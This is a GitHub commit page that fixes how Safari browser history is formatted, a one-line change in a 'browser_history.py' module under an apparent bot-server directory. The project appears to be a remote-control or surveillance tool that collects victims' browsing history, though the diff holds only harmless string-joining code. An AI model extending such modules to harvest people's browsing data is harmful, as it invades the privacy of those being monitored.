Skip to content

Commit

Permalink
Fix retrieving Safari history
Browse files Browse the repository at this point in the history
  • Loading branch information
Marten4n6 committed Jun 24, 2018
1 parent b5b4755 commit a746f91
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion server/modules/bot/browser_history.py
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,7 @@ def print_safari_history(history_limit, output_file):
string_builder += "Safari history: \n"

for item in statement[number:]:
string_builder += item
string_builder += " -> ".join(item)
string_builder += "\n"
else:
with open(output_file, "a+") as out:
Expand Down

0 comments on commit a746f91

Please sign in to comment.